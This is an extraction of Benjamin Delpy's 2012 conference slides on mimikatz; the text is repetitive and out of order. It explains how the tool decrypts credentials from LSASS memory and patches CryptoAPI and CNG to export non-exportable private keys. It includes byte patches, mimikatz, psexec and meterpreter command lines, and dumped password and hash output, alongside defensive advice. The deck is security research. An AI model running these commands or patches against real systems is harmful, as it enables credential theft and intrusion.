mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
